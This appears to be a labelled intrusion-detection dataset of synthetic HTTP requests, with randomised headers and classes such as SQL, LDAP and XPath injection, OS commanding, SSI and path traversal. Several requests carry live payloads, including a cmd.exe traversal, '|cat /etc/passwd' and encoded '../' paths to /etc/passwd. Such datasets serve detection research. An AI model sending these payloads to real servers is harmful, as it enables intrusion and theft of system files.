If-None-Match: "-_nwA0BgoQ7nevSKe"
If-Range: Sun, 05 Jul 09 21:38:34 GMT
Max-Forwards: 54
MIME-Version: 5.8
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic QW5oYmlwcmw6TmkzM2x2
Range: -65233,-6365
Referer: /rprI2/asBx/2awlilo/thttZt/2eettlol.mpeg
TE: deflate,trailers
Trailer: Expect
User-Agent: iH9@mmgG@ http://www.cado.it
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: FTP/1.8 www.eueyt.jpeg
Transfer-Encoding: deflate
Upgrade: ntt4/1.6, tenmqn/4.1, ette/9.5, 9r8/6.4, s4RT/0.2
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42161
Start - Id: 39064
class: LdapInjection
PUT /vwa6/ov7d8dLz4.Zqeo/mRrDvD83pF3hn9hS4tAt/owoaa/MvrcpSST5.css? HTTP/1.1
Content-Length: 21
Content-Language: m,E
Content-Encoding: identity
Content-Location: /rmxdnTbh/mlazsbxe.php3
Content-MD5: cm9ldGpveFR0aVhoc2hoaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Jul 05 08:33:08 CET
Last-Modified: Tue, 31 Jul 07 17:23:27 CET
Host: www.lpraamhtep.biz:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1258, iso-8859-5, utf-7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=3671
Client-ip: 239.175.77.189
Cookie: Uwmsde2nlcgXR73=%ut[;3a52aQHopE4=esw)(&(objectClass    =  got*);8F2edoysls=46078704
Cookie2: $Version="26"
Date: Mon, 03 May 04 01:10:53 CET
ETag: ".MyAxfyG-wPe1WiRrUQq"
Expect: 100-continue
From: ct0nt@neotdaE7.cz
If-Modified-Since: Sat, 15 Jan 05 13:03:36 GMT
If-Unmodified-Since: Wed, 03 Mar 04 16:27:30 CET
If-Match: "QV8Z1UW2wyVdDw6"
If-None-Match: *
If-Range: Wed, 06 Jan 10 20:07:23 CET
Max-Forwards: 7182
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest response="bc4244b1f0ed32c2C5fBb2dF8b3fa903"
Authorization: Basic TXV5ZVU6bmx3dDI=
Range: 42453-074211
Referer: /IahEjedu/ti36.asmx
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: n7gc2ispeueEEo39
UA-CPU: MIPS
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0434x6105
Via: 3.0 111.22.184.125
Transfer-Encoding: gzip
Upgrade: oitn/9.5
Warning: 549 www.saawrM.html "A1bceaisoe" 
X-Serial-Number: 53018392304378
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

is=2753&kP5NyY@ybDW=2

End - Id: 39064
Start - Id: 44023
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 72.190.71.90:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ptv-fa, aacirt-IyChyHvr, i1cae-nnxmma6;q=0.2, hcdti-rmqetos, inags-aoqwtee;q=0.7
Cache-Control: no-transform
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Tue, 28 Feb 06 24:19:13 CET
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sun, 30 Mar 08 04:11:40 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Feb 06 12:17:27 UTC
Max-Forwards: 936
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: rpirso 5hnrkEa=t0ebst
Range: 67-764741,470518-20,3-202913
Referer: /olpae.mpeg
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: erehihcs/7.1.1
UA-CPU: PowerPC
UA-Disp: 696,2974,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44023
Start - Id: 49254
class: XPathInjection
GET /having0ZNXL1FchildjKez0G/eoetnth8ko9daauhiti/iem/No3rpvjnramxan4aii/bYB9vrcp/ecietdel/ktyog/3IdtbTokeo/th-w1.asp?brsag0se=o%27s&1rsb5tces69ee=858962029&emodaicn=haryrtmucoe&lnqsaie=rawelr9iD&tw5tta9tosr0o=twha%27eehnf&hsojdnyfrDis6te=+deF+ge+j%5DtgksApe&Obrrs=15+or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+540%3D&HonTeges=63218864&h9euat=44&19r2eiowti=1757&iXdIroitit=6%3Dt+sietce&ere8=14583 HTTP/1.1
Host: www.eedihl.it
Connection: 94bohtot
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.9, compress;q=0.0, gzip;q=0.9
Accept-Language: e-nse, qshhont-nmeliot;q=0.1, oRoyyc-sediot;q=0.5, aciIiE-shtu, 6-DeccpnL;q=0.9
Cache-Control: no-cache
Client-ip: 247.83.20.197
Cookie: k4rdkat=cseaWReumt
Cookie2: $Version="9"
Date: Tue, 06 Oct 09 15:37:52 CET
ETag: "erUlUONCohcJ0qSw"
Expect: hlebhtr
From: lqie@4vraituc.com
If-Modified-Since: Wed, 22 Oct 08 04:50:41 UTC
If-Unmodified-Since: Mon, 19 Sep 05 08:31:18 UTC
If-Match: "@t8lt4xaei4gXQu"
If-None-Match: *
If-Range: Wed, 25 Oct 06 07:43:47 UTC
Max-Forwards: 0
MIME-Version: 2.0
Pragma: a0efsn=4hm
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/orts/et6ah.tar
Range: 560-83908
Referer: http://8imln0oH.ch/rL5wq.doc
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: atcpuxe0
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: gzip
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 668 www.ijuweeor.jpg "ywtodEgcana" "Mon, 30 Jun 08 19:43:35 UTC"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49254
Start - Id: 49859
class: XPathInjection
GET /eYazFLxN-/shutdownN/4@XBOdeJ3qLocdeOuiA/dSc1jsM-GHV./positiondocumentfBwJRjePbh0z/h6/dallXGCJTQz@Y/rD-qaf1y.A60MOV-oW/slr1aBpryD.tiff?sioea=tR8nptheau&6kH9WUh=Lufn2frUiieif+e&cdirb96h=btauremikoslkyt&HmaMody=aoyrn&jceei5Ahnkigaz=s&os=Karid&3ahDqwort3Tzs4=886&lh8beKhw0btetu=%5Do&iLhaem=emla%27++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or++%27tiegi%27++++%3D+++%27&trz2=hyfn&esozisn5nmo=ttpTo&ojeunel=w1yp2&cEwnsaetyowa1rR=iEaTE6Qh-&mxt=resn HTTP/1.1
Host: 0.209.75.13
Connection: close
Accept: audio/*;q=0.6, application/zip;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity, identity, gzip;q=0.6
Accept-Language: *
Cache-Control: max-stale=87190
Client-ip: 106.168.13.91
Cookie: hTet5=Lnetcat
Cookie2: $Version="51"
Date: Sat, 17 Jan 09 22:43:30 UTC
ETag: "NDiIklCvnhpXi_h6"
Expect: 100-continue
From: eslc7@67owp.net
If-Modified-Since: Thu, 05 May 05 11:47:39 UTC
If-Unmodified-Since: Thu, 24 Mar 05 18:56:24 UTC
If-Match: *
If-None-Match: "3qr4bQbvXafF6Xiy"
If-Range: *
Max-Forwards: 8420
MIME-Version: 4.7
Pragma: pn2=eN2
Proxy-Authorization: NTLM b3NuaFBhaDRjZW9oaWhueG50aGJuaWQ4OGVUOHg0RXRucw==
Authorization: xlE0 aelJ=NEonemxl
Range: 40331-8,658595-,136-
Referer: /exuaWsft.js
TE: trailers
Trailer: From
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 8.0; Eo-ks; rv:5.2.2) Gecko/87206875
UA-CPU: MIPS
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 035x0433
Via: 9.1 62.8.231.97
Transfer-Encoding: deflate
Upgrade: eht/0.8, T3l/7.9, myt2/5.8
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49859
Start - Id: 46334
class: PathTransversal
GET /tIr56nrap3aone/tv2ByCV/eXk2BE/3cnr942xthnwstTzaG/o5SLp4PT/rkaehtrm/hh0ef.nb29/d5/7fromCxBlikeKb8zI4lk/qfeopS3iaaugaenN3/3DSJGR7WTC/RtAbtNgdom2jtat.jsp?R81P=3&odosnheio=733417&lR=2Eeh&mRcas=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&1nceilhxa=qlnabt HTTP/1.0
Host: 242.197.230.70
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-8-i;q=0.0, x-mac-hebrew
Accept-Encoding: gzip;q=0.9, deflate;q=0.3, deflate;q=0.5
Accept-Language: tne7n-6n
Cache-Control: no-cache
Client-ip: 142.8.138.99
Cookie: Rs=6ejjatuzlocationoexe1$;acAthva=77433;Y5mform=rLthti9U
Cookie2: $Version="16"
Date: Wed, 16 Jul 08 02:43:41 GMT
ETag: "sMENIf_6Ej0sdIM"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Jan 07 18:04:25 UTC
Max-Forwards: 684
MIME-Version: 3.4
Pragma: Ue=uyd3P
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 11-897,103770-88,-588131
Referer: http://www.ojOo.net/ohsIa/me0fhgo/ttte/i1sl.gz
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 2.4; oe-9t; rv:8.2.4) Gecko/29984383
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 598x8169
Via: FTP/6.3 154.147.197.111:0, FTP/6.2 21.191.231.200
Transfer-Encoding: identity
Upgrade: frm/0.2, 81cs/4.4, ouWo/8.1, terkqe/4.1, t3rxyn/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 57915246628562313
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46334
Start - Id: 39219
class: SSI
GET /eaU1g@NlkWlLAR6hVigt.php4?qmhrtrn=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 230.139.49.175:282
Connection: close
Accept: text/plain, image/*, audio/*
Accept-Charset: big5
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 139.182.4.92
Cookie: etme3oOesobs=2186618
Cookie2: $Version="9"
Date: Wed, 04 Apr 07 23:02:45 GMT
ETag: "stS0mrsBNpQBIdeOv"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Fri, 27 Oct 06 04:44:51 GMT
If-Unmodified-Since: Sat, 13 Jun 09 22:20:04 UTC
If-Match: "8y6XS3TIQqZxkyoSF-"
If-None-Match: "s0NKnvzCbUPI4@SZlRMG"
If-Range: Tue, 24 Jun 08 09:54:03 UTC
Max-Forwards: 6042
MIME-Version: 2.2
Pragma: no-cache
Authorization: Basic b0RucWg6Y2F0WXB0a3c=
Range: 5962-
Referer: http://Aeaeseni.st/voed/terr/agmrenr.gif
TE: trailers,trailers
User-Agent: Mozilla/7.9 (compatible; MSIE 0.6; Mac OS X; epshz; j4oumlhiee; uTen2S)
UA-Disp: 4572,5584,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 506x400
Via: HTTP/7.4 www.oact6.js, 7.8 www.famia.jpeg, HTTP/6.0 www.eKectRE.jpg:1
Transfer-Encoding: compress
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 988 51.40.12.35 "rctnf7iObtnydwbkia" "Sat, 31 Dec 05 16:12:13 GMT"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39219
Start - Id: 42720
class: SqlInjection
PUT /2uquobY4Gy.html? HTTP/1.1
Content-Length: 229
Content-Language: N,a
Content-Encoding: compress
Content-MD5: dWk1YWhyZWhlT3VhcnRlVA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 28 Oct 08 02:55:35 CET
Host: www.t0ijbinhif.uk:80
Connection: close
Accept: application/zip;q=0.9, audio/*;q=0.9, video/*;q=0.8
Accept-Charset: iso-2022-kr;q=0.1, euc-kr;q=0.7
Accept-Encoding: 'select   customer_phone     '||'from     customers     '||'where customer_surname='''||     lv_surname||''' and customer_type=1';
Accept-Language: do-f, it-nlpee;q=0.8, 8ritAaeR-gn;q=0.2, wi28oe-ht8i;q=0.0
Cache-Control: max-stale
Cookie2: $Version="1"
Date: Tue, 11 Oct 05 10:51:19 GMT
Expect: 100-continue
If-Modified-Since: Sun, 08 Aug 04 23:02:48 CET
If-Unmodified-Since: Sat, 14 Nov 09 08:18:46 GMT
If-Match: *
Max-Forwards: 533
MIME-Version: 7.5
Referer: /d9x4sh/innd/oeotzr/retaor/Bngs.css
TE: trailers,gzip
User-Agent: Mozilla/3.8 (Windows; U; Windows NT 9.2; 6L-bH; rv:4.0.9) Gecko/20046127
UA-CPU: StrongARM
Upgrade: voFoet/7.8, oRnfo/8.0
X-Serial-Number: 3359493

cc7ahshsiodda=9771&bmiyhE=]tA8e&L14SyEyXdur=hNwDp4&d7=351&4rZob1blthrpln=rCsnmdftp7uu&yiset=services&sonnyI=80151&t1i1etenhth=Gformahx&3erdbnEo=9&9eesn=e5ls\irzpe&1peM1ososyco=jstfturkcoyeartolink11l&ol7snuU7er= eErnt~2?e

End - Id: 42720
Start - Id: 35305
class: SqlInjection
GET /9QMj4eEVb9cww/4yr/gptajyno9hatmhnae9/svE9iO99q/wyrEbomm0jx/VhSX.9K@TnN.js?includeNM.zH=leattjO&ieesUhevft=tP4mfVOw1t&XI6H=openndeaad-bodyabf&rasten1r9e=iqlitnteeaftswni&k5nd3hesysaaor=14&xeeoily=7455&s9a5tatysahsi9i=6gractgekEm&muka=aupdatel7i&ociilafi7rp=OR+++148312391%3D148312391&h9istrjph=696362&sSGss=qt&pn=f6psI HTTP/1.0
Host: www.rPrsy.cz
Connection: close
Accept: image/*, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 1sbeoi-dapen
Cache-Control: no-transform
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="1"
Date: Tue, 06 Jul 04 07:43:18 GMT
ETag: W/"IrUVH_iyD2H0@kEA.u8"
Expect: 100-continue
From: nhtud3@oxbjd.com
If-Modified-Since: Sat, 22 Nov 08 09:16:55 GMT
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jul 05 08:26:59 UTC
Max-Forwards: 01
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic bGVhY29vZjp0Z2xucmlv
Authorization: Digest nonce
Range: -4116,868652-10
Referer: http://www.icOswn.be/ttei/qPsnn6u/bbiSr/2Wbjix3/cjeao.php4
TE: chunked;q=0.2,gzip;q=0.8,chunked;q=0.7
Trailer: If-None-Match
User-Agent: heeaaen5n/2.0.5.8.1
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 7.2 29.140.115.46, HTTP/6.8 www.shhseom5.jpeg, 7.4 www.tr5alitb.htm:3747
Transfer-Encoding: compress
Upgrade: dzlnt/9.5, oo3l/2.4
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35305
Start - Id: 49074
class: XPathInjection
GET /sti0/mn42Z8P4n/h3MRl-/dTVld/0dNiFpUNJJK24xGFr/nuE/aetuZ6cdlugos5.cfm?lrazgelesx=wt9&iluwtoofaecdhhA=AsnrnGn%27+or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+%27td7%27++%3D++%27&ss=065&srolyaeeAeh2eaW=601456&ua=%290e&nhneifspma=ttaososhOra&ao8hatruanaie=dropt&tipEzsyakifnnpi=c%2Fdn6fmry&gmiqoaa=66539&ayhdAenittn=rA1XO10M&7tatdelnseecp=liheusrhois&I1zgan6SAcq=fwreK7s%2F%40&t1Ituardtrpst=access_logiaIeucmd&baf=hd&tre=formt%2Faaaeirl2 HTTP/1.0
Host: www.azvg.it:80
Connection: pce8ht
Accept: application/*, text/xml;q=0.2, audio/basic
Accept-Charset: windows-1252, iso-8859-7;q=0.7, windows-1253
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: yaeuckcg='ieen4noo'
Client-ip: 22.250.1.169
Cookie: vlse=10
Cookie2: $Version="08"
Date: Sun, 12 Mar 06 07:14:38 CET
ETag: "FxFGVkKbgEi3wINjXU0"
Expect: 100-continue
From: norRi@7iswxtjsoi.uk
If-Modified-Since: Sun, 23 Aug 09 16:16:58 UTC
If-Unmodified-Since: Tue, 14 Oct 08 08:56:10 GMT
If-Match: *
If-None-Match: "n-qE_YToRSrNKuX"
If-Range: *
Max-Forwards: 081
MIME-Version: 5.6
Pragma: q1peqba='dmm'
Proxy-Authorization: Digest opaque="h9eeeY"
Authorization: Digest algorithm=h4hoh
Range: -42,-211,1-7615
Referer: http://www.wey3e.com/ynja/ea7csYe/nrawrs.wav
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/3.2 (Windows; U; Win98 7.5; b3-l1; rv:0.5.6) Gecko/99536843
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 1.6 162.153.152.28, 3.1 44.85.182.239, HTTP/2.8 67.123.162.47
Transfer-Encoding: nIye; Eeinf=oilog
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49074
Start - Id: 37124
class: LdapInjection
GET /nr/of1gWjLb6-4Q8rvnP4Rt.png?Er42dezh=e9Tij&Iefhth=O&rdItsht=oiheA8&fAeaet6em=%29%264&aaoie8tool=exlUw36&bgsound4dropnbetweenMuo5=qeshutdownAa&deletevEexec@uaF=6n&nyntaeigi=7yj5MX&e9lmtaesl8z=750441&oeoc6=40&vL_rS=epXqsgFV&2EKGpasswd3systemPvT=35&rhn4k=dnEa%29%28++%7C%28sptui%3D*%29 HTTP/1.1
Host: 30.43.255.61
Connection: close
Accept: video/*, audio/*
Accept-Charset: iso-8859-5;q=0.5, iso-8859-6;q=0.3, utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 55.97.57.216
Cookie: q484DL=qiajdsIydto&mh;eiNxohr7TrnlCl=23;rFUroosgt8=erzaagr4ohuyR;tnidOirUrAtwys=rEIpF
Cookie2: $Version="74"
Date: Tue, 08 Sep 09 05:33:20 UTC
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 31 Jul 06 20:06:49 GMT
If-Unmodified-Since: Mon, 12 Jun 06 12:35:30 UTC
If-Match: *
If-None-Match: ".kf_KyC@ctRwzdYhEfrw"
If-Range: Tue, 06 May 08 14:13:30 UTC
Max-Forwards: 756
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: see9 isegk=eecbta
Range: -5173
Referer: /enBci/rnooT/ie6ne/ar3t7.jpeg
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: oWCkHPgcaL http://www.letoal.org
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: FTP/1.5 www.Uoscidn.htm, t4li/2.0 202.230.184.254:4
Transfer-Encoding: cEha
Upgrade: tRvc9/2.0
Warning: 985 www.hortt.htm "epvsa7dt6thxel" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37124
Start - Id: 49269
class: XPathInjection
GET /wqtgaEtournvhr/ys8ebdns/dh4eodtnaCFYneoEa/aXO6znbyxJQmB2G/oAndrbOOD/l5tc9.U2l7/nl-Rme1Q/hhehi4M1rw7mcweou/tqdI/tlaqsvT/tH8vx0BYzFxXPky0CkI/gzO9rl.html?dlehwt1=ae%2FNlL%2Fm9yV%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D255%5D+%7C+++it%2F0cnS%2FjAuslr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D57%5D+++or+++%27ii8rxi%27++++%3D+++%27 HTTP/1.0
Host: 216.193.138.185
Connection: keep-alive
Accept: application/postscript;q=0.9
Accept-Charset: windows-1252
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 88.174.167.80
Cookie: e4idettwren=7331;mtaenttoehOzcnO=hle/rfx
Cookie2: $Version="395"
Date: Tue, 02 Aug 05 18:59:40 CET
ETag: W/"U5U_78@j-0G5kJ9g"
Expect: GerE30=m8mee1ye
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Thu, 08 Dec 05 14:42:54 CET
If-Match: *
If-None-Match: *
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 93
MIME-Version: 1.6
Pragma: oa=t
Proxy-Authorization: NTLM ZWVhc2thdGdlMmpwc3J5YmxsaGU3YUV3c2VzdGhhMmV0b2Q=
Authorization: ineri httr=dlatwt3E
Range: 560-83908
Referer: /as9f2u/ddt4/4ur2Pres/ye9e.gif
TE: trailers,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.8 (Windows; U; WinNT 5.2; 2e-lo; rv:9.0.9) Gecko/46469106
UA-CPU: StrongARM
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 2.2 197.241.147.220
Transfer-Encoding: jsiflo
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49269
Start - Id: 43320
class: OsCommanding
GET /ipK5KFPYCsg3ZHlzsn/TPxtermTBq/zoiNehnewrmae/aymLen8nafmetm/6A4cboAWXCk5e/mrn/unionrm/hh/tozattiniee8uofuc4/sa0ateLuhseqaiirhr.tiff?ddn=ecmdsranea%40hde%5D+f&esusrw=%7Ccat++%2Fetc%2Fpasswd HTTP/1.0
Host: 244.30.82.160:603
Connection: keep-alive
Accept: application/zip;q=0.5, audio/x-wav;q=0.5, text/html
Accept-Charset: macintosh;q=0.5, gb2312;q=0.2, ks_c_5601-1987;q=0.8, windows-1250;q=0.3
Accept-Encoding: *
Accept-Language: at3ec8-zna, dsto-teicvmt, cc-c, ns-eE8l;q=0.9, id-leod
Cache-Control: lrT=us
Client-ip: 170.237.233.234
Cookie: jrnrfrthtnlon=Morhesa17hwP;FVG@DD=aartf;in=$ooeh|wgeteopt)zae ooh;sO=96;sdrp=r5WlaieeM;t5Pg_sXPW9A=zsahw
Cookie2: $Version="3"
Date: Tue, 11 Aug 09 04:47:22 GMT
ETag: "L6Op1aeDmT9K1KLGR"
Expect: trl2g=ErI0fhr
From: eTnr@war0.be
If-Modified-Since: Sat, 17 Dec 05 15:46:35 CET
If-Unmodified-Since: Tue, 02 Mar 04 24:52:39 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Apr 05 02:36:54 CET
Max-Forwards: 31
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: eDloa hhEAnpe=aemiftda
Range: 2030-1
Referer: http://www.dnqooul.it/sc0EoDnl/vexH/nnlrjiln/isiatn/0ioxdGe.cfm
TE: trailers,deflate,gzip
Trailer: Authorization
User-Agent: eYBein4VF http://www.fhm8tG.de
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: FTP/9.5 www.cedud.css
Transfer-Encoding: gzip
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43320
Start - Id: 38886
class: LdapInjection
GET /F67Meb4IBCAh4/lDdQu/tS_XsfM9.mdb?s5ggmwhircavhr=dWDI903K&yimUS=75921&eltusle7v1ens=9R0%29%28++%7C+++%28SbtOn%3D*%29&gasCd0tsaue=ninclude2i&siycnibot=ej&3ocNlkemh=598&Rnpe5nh=%3Asam&bydfd=2548&qsrlPiemiuMa=59524&zKXZpasswdbh-ubformr=1108304&urowtoetdjsDe=0574402 HTTP/1.0
Host: www.ethYIaKCr.org
Connection: nngsti
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: hnj-ttntdoh
Cache-Control: xaiely=r
Client-ip: 191.208.34.138
Cookie: Yeferunltms=5683260627;-dHajFk9a=seerhtpassr8OOic1a o;emhwfosa4tSs=o-i;hlUn4=1987912;_Weid0zvKN=goSo|nb1oee;aetyt0efh9os=zcA
Cookie2: $Version="1"
Date: Mon, 15 Nov 04 24:30:02 CET
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Tue, 11 Aug 09 15:22:37 GMT
If-Unmodified-Since: Sat, 30 Oct 04 20:09:49 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 31 Dec 09 24:35:10 UTC
Max-Forwards: 368
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM MnQzaW9iYWF0aHNsUnRjYzBudGlpa0FvVWVjZWE3ZWlwNGVsaHNpYWZpc3BoZWE=
Authorization: Digest nonce
Range: 15934-,799-8058,-81465
Referer: /cle8s/ymfr4d/1sqot/yhahpt/t9Ebts.wmn
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (compatible; nnhdim4en; Win98; earixi; eje5nEz)
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 5.4 www.afeah.tiff:05, FTP/8.6 www.enHl6cv.gif:90782
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: aHt/9.9, puadon/4.1, Ahs/8.1
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
